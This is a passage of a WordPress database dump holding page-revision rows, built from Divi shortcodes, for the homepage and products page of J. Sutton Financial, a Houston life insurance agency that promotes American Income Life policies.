Need?</strong></h2>[/et_pb_text][et_pb_code _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][gravityform id=\"1\" title=\"false\" description=\"false\" ajax=\"true\"][/et_pb_code][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" background_color=\"rgba(158,153,153,0.1)\" custom_margin=\"66px|||||\" custom_padding=\"1px||0px|||\" hover_enabled=\"0\" global_colors_info=\"{}\" sticky_enabled=\"0\"][et_pb_row column_structure=\"2_3,1_3\" admin_label=\"Row\" _builder_version=\"4.20.2\" _module_preset=\"default\" custom_margin=\"10px|auto||auto||\" custom_padding=\"66px||66px|||\" global_colors_info=\"{}\"][et_pb_column type=\"2_3\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" text_text_color=\"#000000\" text_font_size=\"16px\" custom_padding=\"||0px|||\" global_colors_info=\"{}\"]<h2 style=\"text-align: center;\">Join Our Team!</h2>\n<p>J. Sutton Financial is always looking for new, motivated talent to join our fun team of highly trained agents and managers. If you\'re looking to break out of the standard mold and take your career to the next level, look no further. Find out how you can grow together with J. Sutton Financial.</p>[/et_pb_text][dsm_button button_one_text=\"Apply Now!\" button_one_url=\"@ET-DC@eyJkeW5hbWljIjp0cnVlLCJjb250ZW50IjoicG9zdF9saW5rX3VybF9wYWdlIiwic2V0dGluZ3MiOnsicG9zdF9pZCI6IjM4In19@\" button_alignment=\"center\" _builder_version=\"4.20.2\" _dynamic_attributes=\"button_one_url\" _module_preset=\"default\" custom_button_one=\"on\" button_one_text_color=\"#FFFFFF\" button_one_bg_color=\"#003372\" button_one_border_width=\"0px\" button_one_border_radius=\"14px\" box_shadow_style_button_one=\"preset2\" global_colors_info=\"{}\"][/dsm_button][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][dsm_perspective_image src=\"http://cmdev-site1.com/wp-content/uploads/2023/03/People-Icon.png\" title_text=\"People Icon\" _builder_version=\"4.20.2\" _module_preset=\"default\" width=\"70%\" custom_margin=\"|||0px||\" custom_padding=\"|||0px||\" animation_direction=\"left\" global_colors_info=\"{}\"][/dsm_perspective_image][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" background_image=\"http://cmdev-site1.com/wp-content/uploads/2023/03/Downtown-Houston-skyline-Black-White-6139-x-2500-scaled.jpg\" custom_margin=\"-11px|||||\" custom_padding=\"11px||0px|||\" global_colors_info=\"{}\"][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" min_height=\"199.3px\" custom_padding=\"67px||141px|||\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][dsm_typing_effect typing_effect=\"Proudly headquartered in Houston, Texas!\" typing_cursor_color=\"#FFFFFF\" typing_background_color=\"RGBA(255,255,255,0)\" _builder_version=\"4.20.2\" _module_preset=\"default\" header_level=\"h2\" header_text_align=\"center\" typing_text_color=\"#FFFFFF\" custom_margin=\"54px|||||\" global_colors_info=\"{}\"][/dsm_typing_effect][/et_pb_column][/et_pb_row][/et_pb_section]','Home','','inherit','closed','closed','','138-revision-v1','','','2023-04-08 19:28:36','2023-04-08 19:28:36','',138,'http://cmdev-site1.com/?p=801',0,'revision','',0),(804,1,'2023-04-08 19:31:14','2023-04-08 19:31:14','[et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" custom_margin=\"18px||||false|false\" custom_padding=\"0px|||||\" hover_enabled=\"0\" global_colors_info=\"{}\" background_color=\"rgba(158,153,153,0.1)\" sticky_enabled=\"0\" min_height=\"1552px\"][et_pb_row column_structure=\"1_3,2_3\" admin_label=\"row\" _builder_version=\"4.20.2\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" width=\"100%\" max_width=\"100%\" custom_margin=\"-3px|auto|-74px|auto||\" custom_padding=\"92px||66px|||\" hover_enabled=\"0\" global_colors_info=\"{}\" sticky_enabled=\"0\"][et_pb_column type=\"1_3\" _builder_version=\"4.16\" custom_padding=\"|||\" global_colors_info=\"{}\" custom_padding__hover=\"|||\"][dsm_perspective_image src=\"http://cmdev-site1.com/wp-content/uploads/2023/04/Thumbs-Up-Icon-No-Background-Hex-666666.png\" title_text=\"Thumbs Up Icon No Background Hex 666666\" _builder_version=\"4.20.2\" _module_preset=\"default\" width=\"70%\" custom_margin=\"|37px||89px||\" custom_padding=\"33px|1px||||\" animation_style=\"roll\" animation_direction=\"left\" hover_enabled=\"0\" global_colors_info=\"{}\" sticky_enabled=\"0\"][/dsm_perspective_image][/et_pb_column][et_pb_column type=\"2_3\" _builder_version=\"4.16\" custom_padding=\"|||\" global_colors_info=\"{}\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" custom_margin=\"||18px|-20px||\" custom_padding=\"57px|||||\" global_colors_info=\"{}\"]<h2><strong>Providing Premium Life Insurance<br />Policies to Americans Nationwide</strong></h2>[/et_pb_text][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" custom_margin=\"-7px|||-17px||\" global_colors_info=\"{}\"]<p>Sutton Financial provides high quality life insurance policies to Texans. Our agents proudly serve individuals from all walks of life, and can help you choose the right insurance policy to protect you and yours for years to come. J. Sutton Financial agents take pride in being approachable and easy to work with, helping you to make the right decisions for your family for decades to come.</p>[/et_pb_text][dsm_button button_one_text=\"Learn More\" button_one_url=\"@ET-DC@eyJkeW5hbWljIjp0cnVlLCJjb250ZW50IjoicG9zdF9saW5rX3VybF9wYWdlIiwic2V0dGluZ3MiOnsicG9zdF9pZCI6IjI2In19@\" button_one_lightbox_close_color=\"#FFFFFF\" button_two_lightbox_close_color=\"#FFFFFF\" button_alignment=\"center\" _builder_version=\"4.20.2\" _dynamic_attributes=\"button_one_url\" _module_preset=\"default\" custom_button_one=\"on\" button_one_text_color=\"#FFFFFF\" button_one_bg_color=\"#003372\" button_one_border_width=\"0px\" button_one_border_color=\"RGBA(255,255,255,0)\" button_one_border_radius=\"14px\" custom_button_two=\"on\" button_two_text_color=\"#000000\" button_two_bg_color=\"#ffffff\" button_two_border_width=\"0px\" button_two_border_color=\"RGBA(255,255,255,0)\" button_two_border_radius=\"14px\" custom_margin=\"||10px|||\" box_shadow_style_button_one=\"preset2\" global_colors_info=\"{}\"][/dsm_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" theme_builder_area=\"post_content\" _builder_version=\"4.20.2\" _module_preset=\"default\" custom_margin=\"-15px|||||\"][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" theme_builder_area=\"post_content\"][et_pb_column _builder_version=\"4.20.2\" _module_preset=\"default\" type=\"4_4\" theme_builder_area=\"post_content\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" header_2_text_align=\"center\" global_colors_info=\"{}\" theme_builder_area=\"post_content\"]<h2><strong>Want To Know How Much Insurance You Need?</strong></h2>[/et_pb_text][et_pb_code _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\" theme_builder_area=\"post_content\"][gravityform id=\"1\" title=\"false\" description=\"false\" ajax=\"true\"][/et_pb_code][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" background_color=\"rgba(158,153,153,0.1)\" custom_margin=\"66px|||||\" custom_padding=\"1px||0px|||\" hover_enabled=\"0\" global_colors_info=\"{}\" sticky_enabled=\"0\"][et_pb_row column_structure=\"2_3,1_3\" admin_label=\"Row\" _builder_version=\"4.20.2\" _module_preset=\"default\" custom_margin=\"10px|auto||auto||\" custom_padding=\"66px||66px|||\" global_colors_info=\"{}\"][et_pb_column type=\"2_3\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" text_text_color=\"#000000\" text_font_size=\"16px\" custom_padding=\"||0px|||\" global_colors_info=\"{}\"]<h2 style=\"text-align: center;\">Join Our Team!</h2>\n<p>J. Sutton Financial is always looking for new, motivated talent to join our fun team of highly trained agents and managers. If you\'re looking to break out of the standard mold and take your career to the next level, look no further. Find out how you can grow together with J. Sutton Financial.</p>[/et_pb_text][dsm_button button_one_text=\"Apply Now!\" button_one_url=\"@ET-DC@eyJkeW5hbWljIjp0cnVlLCJjb250ZW50IjoicG9zdF9saW5rX3VybF9wYWdlIiwic2V0dGluZ3MiOnsicG9zdF9pZCI6IjM4In19@\" button_alignment=\"center\" _builder_version=\"4.20.2\" _dynamic_attributes=\"button_one_url\" _module_preset=\"default\" custom_button_one=\"on\" button_one_text_color=\"#FFFFFF\" button_one_bg_color=\"#003372\" button_one_border_width=\"0px\" button_one_border_radius=\"14px\" box_shadow_style_button_one=\"preset2\" global_colors_info=\"{}\"][/dsm_button][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][dsm_perspective_image src=\"http://cmdev-site1.com/wp-content/uploads/2023/03/People-Icon.png\" title_text=\"People Icon\" _builder_version=\"4.20.2\" _module_preset=\"default\" width=\"70%\" custom_margin=\"|||0px||\" custom_padding=\"|||0px||\" animation_direction=\"left\" global_colors_info=\"{}\"][/dsm_perspective_image][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" background_image=\"http://cmdev-site1.com/wp-content/uploads/2023/03/Downtown-Houston-skyline-Black-White-6139-x-2500-scaled.jpg\" custom_margin=\"-11px|||||\" custom_padding=\"11px||0px|||\" global_colors_info=\"{}\"][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" min_height=\"199.3px\" custom_padding=\"67px||141px|||\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][dsm_typing_effect typing_effect=\"Proudly headquartered in Houston, Texas!\" typing_cursor_color=\"#FFFFFF\" typing_background_color=\"RGBA(255,255,255,0)\" _builder_version=\"4.20.2\" _module_preset=\"default\" header_level=\"h2\" header_text_align=\"center\" typing_text_color=\"#FFFFFF\" custom_margin=\"54px|||||\" global_colors_info=\"{}\"][/dsm_typing_effect][/et_pb_column][/et_pb_row][/et_pb_section]','Home','','inherit','closed','closed','','138-revision-v1','','','2023-04-08 19:31:14','2023-04-08 19:31:14','',138,'http://cmdev-site1.com/?p=804',0,'revision','',0),(809,1,'2023-04-08 19:35:00','2023-04-08 19:35:00','[et_pb_section fb_built=\"1\" theme_builder_area=\"post_content\" _builder_version=\"4.20.2\" _module_preset=\"default\" background_color=\"rgba(158,153,153,0.1)\" hover_enabled=\"0\" sticky_enabled=\"0\"][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" theme_builder_area=\"post_content\" column_structure=\"1_3,2_3\" hover_enabled=\"0\" sticky_enabled=\"0\"][et_pb_column _builder_version=\"4.20.2\" _module_preset=\"default\" type=\"1_3\" theme_builder_area=\"post_content\"][dsm_perspective_image src=\"http://cmdev-site1.com/wp-content/uploads/2023/04/Thumbs-Up-Icon-No-Background-Hex-666666.png\" title_text=\"Thumbs Up Icon No Background Hex 666666\" _builder_version=\"4.20.2\" _module_preset=\"default\" width=\"70%\" custom_margin=\"|37px||89px||\" custom_padding=\"33px|1px||||\" animation_style=\"roll\" animation_direction=\"left\" hover_enabled=\"0\" global_colors_info=\"{}\" sticky_enabled=\"0\" theme_builder_area=\"post_content\" animation_duration=\"750ms\"][/dsm_perspective_image][/et_pb_column][et_pb_column _builder_version=\"4.20.2\" _module_preset=\"default\" type=\"2_3\" theme_builder_area=\"post_content\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" custom_margin=\"||18px|-20px||\" custom_padding=\"57px|||||\" global_colors_info=\"{}\" theme_builder_area=\"post_content\"]<h2><strong>Providing Premium Life Insurance<br />Policies to Americans Nationwide</strong></h2>[/et_pb_text][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" custom_margin=\"-7px|||-17px||\" global_colors_info=\"{}\" theme_builder_area=\"post_content\"]<p>Sutton Financial provides high quality life insurance policies to Texans. Our agents proudly serve individuals from all walks of life, and can help you choose the right insurance policy to protect you and yours for years to come. J. Sutton Financial agents take pride in being approachable and easy to work with, helping you to make the right decisions for your family for decades to come.</p>[/et_pb_text][dsm_button button_one_text=\"Learn More\" button_one_url=\"@ET-DC@eyJkeW5hbWljIjp0cnVlLCJjb250ZW50IjoicG9zdF9saW5rX3VybF9wYWdlIiwic2V0dGluZ3MiOnsicG9zdF9pZCI6IjI2In19@\" button_one_lightbox_close_color=\"#FFFFFF\" button_two_lightbox_close_color=\"#FFFFFF\" button_alignment=\"center\" _builder_version=\"4.20.2\" _dynamic_attributes=\"button_one_url\" _module_preset=\"default\" custom_button_one=\"on\" button_one_text_color=\"#FFFFFF\" button_one_bg_color=\"#003372\" button_one_border_width=\"0px\" button_one_border_color=\"RGBA(255,255,255,0)\" button_one_border_radius=\"14px\" custom_button_two=\"on\" button_two_text_color=\"#000000\" button_two_bg_color=\"#ffffff\" button_two_border_width=\"0px\" button_two_border_color=\"RGBA(255,255,255,0)\" button_two_border_radius=\"14px\" custom_margin=\"||10px|||\" box_shadow_style_button_one=\"preset2\" global_colors_info=\"{}\" theme_builder_area=\"post_content\"][/dsm_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" theme_builder_area=\"post_content\" _builder_version=\"4.20.2\" _module_preset=\"default\" custom_margin=\"-15px|||||\"][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" theme_builder_area=\"post_content\"][et_pb_column _builder_version=\"4.20.2\" _module_preset=\"default\" type=\"4_4\" theme_builder_area=\"post_content\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" header_2_text_align=\"center\" global_colors_info=\"{}\" theme_builder_area=\"post_content\"]<h2><strong>Want To Know How Much Insurance You Need?</strong></h2>[/et_pb_text][et_pb_code _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\" theme_builder_area=\"post_content\"][gravityform id=\"1\" title=\"false\" description=\"false\" ajax=\"true\"][/et_pb_code][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" background_color=\"rgba(158,153,153,0.1)\" custom_margin=\"66px|||||\" custom_padding=\"1px||0px|||\" hover_enabled=\"0\" global_colors_info=\"{}\" sticky_enabled=\"0\"][et_pb_row column_structure=\"2_3,1_3\" admin_label=\"Row\" _builder_version=\"4.20.2\" _module_preset=\"default\" custom_margin=\"10px|auto||auto||\" custom_padding=\"66px||66px|||\" global_colors_info=\"{}\"][et_pb_column type=\"2_3\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" text_text_color=\"#000000\" text_font_size=\"16px\" custom_padding=\"||0px|||\" global_colors_info=\"{}\"]<h2 style=\"text-align: center;\">Join Our Team!</h2>\n<p>J. Sutton Financial is always looking for new, motivated talent to join our fun team of highly trained agents and managers. If you\'re looking to break out of the standard mold and take your career to the next level, look no further. Find out how you can grow together with J. Sutton Financial.</p>[/et_pb_text][dsm_button button_one_text=\"Apply Now!\" button_one_url=\"@ET-DC@eyJkeW5hbWljIjp0cnVlLCJjb250ZW50IjoicG9zdF9saW5rX3VybF9wYWdlIiwic2V0dGluZ3MiOnsicG9zdF9pZCI6IjM4In19@\" button_alignment=\"center\" _builder_version=\"4.20.2\" _dynamic_attributes=\"button_one_url\" _module_preset=\"default\" custom_button_one=\"on\" button_one_text_color=\"#FFFFFF\" button_one_bg_color=\"#003372\" button_one_border_width=\"0px\" button_one_border_radius=\"14px\" box_shadow_style_button_one=\"preset2\" global_colors_info=\"{}\"][/dsm_button][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][dsm_perspective_image src=\"http://cmdev-site1.com/wp-content/uploads/2023/03/People-Icon.png\" title_text=\"People Icon\" _builder_version=\"4.20.2\" _module_preset=\"default\" width=\"70%\" custom_margin=\"|||0px||\" custom_padding=\"|||0px||\" animation_direction=\"left\" global_colors_info=\"{}\"][/dsm_perspective_image][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" background_image=\"http://cmdev-site1.com/wp-content/uploads/2023/03/Downtown-Houston-skyline-Black-White-6139-x-2500-scaled.jpg\" custom_margin=\"-11px|||||\" custom_padding=\"11px||0px|||\" global_colors_info=\"{}\"][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" min_height=\"199.3px\" custom_padding=\"67px||141px|||\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][dsm_typing_effect typing_effect=\"Proudly headquartered in Houston, Texas!\" typing_cursor_color=\"#FFFFFF\" typing_background_color=\"RGBA(255,255,255,0)\" _builder_version=\"4.20.2\" _module_preset=\"default\" header_level=\"h2\" header_text_align=\"center\" typing_text_color=\"#FFFFFF\" custom_margin=\"54px|||||\" global_colors_info=\"{}\"][/dsm_typing_effect][/et_pb_column][/et_pb_row][/et_pb_section]','Home','','inherit','closed','closed','','138-revision-v1','','','2023-04-08 19:35:00','2023-04-08 19:35:00','',138,'http://cmdev-site1.com/?p=809',0,'revision','',0),(810,1,'2023-04-08 19:49:52','2023-04-08 19:49:52','[et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_row column_structure=\"1_3,2_3\" _builder_version=\"4.20.2\" _module_preset=\"default\" custom_padding=\"66px||66px|||\" global_colors_info=\"{}\"][et_pb_column type=\"1_3\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][dsm_perspective_image src=\"http://cmdev-site1.com/wp-content/uploads/2023/03/Shaking-Hands-Icon-No-Background-Hex-666666-scaled.jpg\" alt=\"handshake icon\" title_text=\"Shaking Hands Icon No Background Hex 666666\" _builder_version=\"4.20.2\" _module_preset=\"default\" custom_margin=\"-31px|||||\" animation_style=\"flip\" animation_direction=\"right\" global_colors_info=\"{}\"][/dsm_perspective_image][/et_pb_column][et_pb_column type=\"2_3\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" custom_margin=\"48px|||||\" global_colors_info=\"{}\"]<h2 style=\"text-align: center;\">Our Promise To You</h2>\n<p>At J. Sutton Financial, our insurance products and services are backed by a promise.</p>\n<p>A Promise of: Financial security and protection for our clients. Commitment and fairness to our agents. Respect and opportunity for our employees. We are committed to bringing a quality product to market while providing the best service at the lowest possible cost.</p>\n<p>&nbsp;</p>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" background_image=\"http://cmdev-site1.com/wp-content/uploads/2023/03/About-American-Life-Insurance-Muted-scaled.jpg\" global_colors_info=\"{}\"][et_pb_row column_structure=\"1_3,2_3\" _builder_version=\"4.20.2\" _module_preset=\"default\" custom_padding=\"66px||66px|||\" global_colors_info=\"{}\"][et_pb_column type=\"1_3\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" text_text_color=\"#FFFFFF\" header_2_text_align=\"center\" header_2_text_color=\"#FFFFFF\" min_height=\"8px\" custom_margin=\"32px|||||\" global_colors_info=\"{}\"]<h2>About American Income Life Insurance Company</h2>[/et_pb_text][/et_pb_column][et_pb_column type=\"2_3\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" text_text_color=\"#FFFFFF\" global_colors_info=\"{}\"]<p>American Income Life is an international company protecting working families in the United States, Canada, New Zealand, and through their wholly-owned subsidary, National Income Life Insurance Company in New York. American Income Life has served working class families since 1951 with life, accident, and supplemental health products to help protect members of labor unions, credit unions, associations, and their families. AIL representatives develop long-term relationships with clients and meet them where they are most comfortable...their home. </p>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_row column_structure=\"1_2,1_2\" _builder_version=\"4.20.2\" _module_preset=\"default\" custom_margin=\"66px|auto|66px|auto||\" global_colors_info=\"{}\"][et_pb_column type=\"1_2\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" header_2_text_align=\"center\" header_2_text_color=\"#003372\" global_colors_info=\"{}\"]<h2>American Income Life at a Glance</h2>[/et_pb_text][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" custom_padding=\"29px||0px|||\" global_colors_info=\"{}\"]<ul>\n<li>Headquartered in Waco, Texas</li>\n<li>Life, accident, and supplemental health insurance</li>\n<li>Portable insurance coverage — if you move or change jobs, our insurance coverage stays with you</li>\n<li>Individual, single parent, and family policies available</li>\n</ul>\n<p><em>*This rating refers only to the financial strength of the company and is not a recommendation of the specific policy provisions, rates, or practices of the insurance company.</em></p>[/et_pb_text][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" header_2_text_align=\"center\" header_2_text_color=\"#003372\" global_colors_info=\"{}\"]<h2>American Income Life\'s Parent Company</h2>[/et_pb_text][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"]<p>American Income Life is a wholly-owned subsidiary of Globe Life Inc (NYSE: GL), an S&amp;P 500 Company that markets life and supplemental health insurance for middle-income families through its affiliate companies.</p>\n<p>Globe Life is proudly the official life insurance company of the Dallas Cowboys &amp; owns the naming rights to Globe Life Park, home of the Texas Rangers.</p>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" background_enable_color=\"off\" custom_margin=\"-1px|||||\" custom_padding=\"1px||0px|||\" global_colors_info=\"{}\"][et_pb_row column_structure=\"1_2,1_2\" _builder_version=\"4.20.2\" _module_preset=\"default\" custom_padding=\"66px||66px|||\" global_colors_info=\"{}\"][et_pb_column type=\"1_2\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_image src=\"http://cmdev-site1.com/wp-content/uploads/2023/03/Umbrella-Roll-in-Icon.png\" alt=\"umbrella\" title_text=\"Umbrella Roll in Icon\" align=\"center\" _builder_version=\"4.20.2\" _module_preset=\"default\" width=\"50%\" custom_margin=\"|||193px||\" custom_padding=\"|0px||||\" hover_enabled=\"0\" global_colors_info=\"{}\" animation_style=\"slide\" sticky_enabled=\"0\" animation_direction=\"left\"][/et_pb_image][dsm_text_badges main_text=\"Life Insurance\" badges_text=\"Policies\" badges_background_color=\"#003372\" _builder_version=\"4.20.2\" _module_preset=\"default\" text_orientation=\"center\" custom_margin=\"|||178px||\" link_option_url=\"https://www.ailife.com/products\" global_colors_info=\"{}\"][/dsm_text_badges][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_image src=\"http://cmdev-site1.com/wp-content/uploads/2023/03/Contract-Icon-Grey-Background.png\" alt=\"secure contract icon\" title_text=\"Contract Icon Grey Background\" align=\"center\" _builder_version=\"4.20.2\" _module_preset=\"default\" width=\"50%\" custom_margin=\"|170px||||\" hover_enabled=\"0\" global_colors_info=\"{}\" animation_style=\"slide\" animation_direction=\"right\" sticky_enabled=\"0\"][/et_pb_image][dsm_text_badges main_text=\"Policyholder Services\" badges_background_color=\"#003372\" _builder_version=\"4.20.2\" _module_preset=\"default\" custom_margin=\"|||97px||\" link_option_url=\"https://www.ailife.com/manage-my-policy\" global_colors_info=\"{}\"][/dsm_text_badges][/et_pb_column][/et_pb_row][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" custom_margin=\"||66px||false|false\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_cta button_url=\"http://cmdev-site1.com/\" url_new_window=\"on\" button_text=\"Request an agent today!\" _builder_version=\"4.20.2\" _module_preset=\"default\" background_enable_color=\"off\" custom_button=\"on\" button_text_color=\"#FFFFFF\" button_bg_color=\"#666666\" button_border_width=\"0px\" button_border_radius=\"14px\" background_layout=\"light\" custom_margin=\"-46px|||||\" global_colors_info=\"{}\"][/et_pb_cta][/et_pb_column][/et_pb_row][/et_pb_section]','Products & Services','','inherit','closed','closed','','26-revision-v1','','','2023-04-08 19:49:52','2023-04-08 19:49:52','',26,'http://cmdev-site1.com/?p=810',0,'revision','',0),(836,1,'2023-04-08 20:39:06','2023-04-08 20:39:06','[et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" background_color=\"rgba(158,153,153,0.1)\" global_colors_info=\"{}\"][et_pb_row column_structure=\"1_3,2_3\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_column type=\"1_3\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][dsm_perspective_image src=\"http://cmdev-site1.com/wp-content/uploads/2023/04/Thumbs-Up-Icon-No-Background-Hex-666666.png\" title_text=\"Thumbs Up Icon No Background Hex 666666\" _builder_version=\"4.20.2\" _module_preset=\"default\" width=\"70%\" custom_margin=\"|37px||89px||\" custom_padding=\"33px|1px||||\" animation_style=\"roll\" animation_direction=\"left\" animation_duration=\"1250ms\" hover_enabled=\"0\" global_colors_info=\"{}\" sticky_enabled=\"0\"][/dsm_perspective_image][/et_pb_column][et_pb_column type=\"2_3\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" custom_margin=\"||18px|-20px||\" custom_padding=\"57px|||||\" global_colors_info=\"{}\"]<h2><strong>Providing Premium Life Insurance<br />Policies to Americans Nationwide</strong></h2>[/et_pb_text][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" custom_margin=\"-7px|||-17px||\" global_colors_info=\"{}\"]<p>Sutton Financial provides high quality life insurance policies to Texans. Our agents proudly serve individuals from all walks of life, and can help you choose the right insurance policy to protect you and yours for years to come. J. Sutton Financial agents take pride in being approachable and easy to work with, helping you to make the right decisions for your family for decades to come.</p>[/et_pb_text][dsm_button button_one_text=\"Learn More\" button_one_url=\"@ET-DC@eyJkeW5hbWljIjp0cnVlLCJjb250ZW50IjoicG9zdF9saW5rX3VybF9wYWdlIiwic2V0dGluZ3MiOnsicG9zdF9pZCI6IjI2In19@\" button_one_lightbox_close_color=\"#FFFFFF\" button_two_lightbox_close_color=\"#FFFFFF\" button_alignment=\"center\" _builder_version=\"4.20.2\" _dynamic_attributes=\"button_one_url\" _module_preset=\"default\" custom_button_one=\"on\" button_one_text_color=\"#FFFFFF\" button_one_bg_color=\"#003372\" button_one_border_width=\"0px\" button_one_border_color=\"RGBA(255,255,255,0)\" button_one_border_radius=\"14px\" custom_button_two=\"on\" button_two_text_color=\"#000000\" button_two_bg_color=\"#ffffff\" button_two_border_width=\"0px\" button_two_border_color=\"RGBA(255,255,255,0)\" button_two_border_radius=\"14px\" custom_margin=\"||10px|||\" box_shadow_style_button_one=\"preset2\" global_colors_info=\"{}\"][/dsm_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" custom_margin=\"-15px|||||\" global_colors_info=\"{}\"][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" header_2_text_align=\"center\" global_colors_info=\"{}\"]<h2><strong>Want To Know How Much Insurance You Need?</strong></h2>[/et_pb_text][et_pb_code _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][gravityform id=\"1\" title=\"false\" description=\"false\" ajax=\"true\"][/et_pb_code][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" background_color=\"rgba(158,153,153,0.1)\" custom_margin=\"66px|||||\" custom_padding=\"1px||0px|||\" global_colors_info=\"{}\"][et_pb_row column_structure=\"2_3,1_3\" admin_label=\"Row\" _builder_version=\"4.20.2\" _module_preset=\"default\" custom_margin=\"10px|auto||auto||\" custom_padding=\"66px||66px|||\" global_colors_info=\"{}\"][et_pb_column type=\"2_3\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" text_text_color=\"#000000\" text_font_size=\"16px\" custom_padding=\"||0px|||\" global_colors_info=\"{}\"]<h2 style=\"text-align: center;\">Join Our Team!</h2>\n<p>J. Sutton Financial is always looking for new, motivated talent to join our fun team of highly trained agents and managers. If you\'re looking to break out of the standard mold and take your career to the next level, look no further. Find 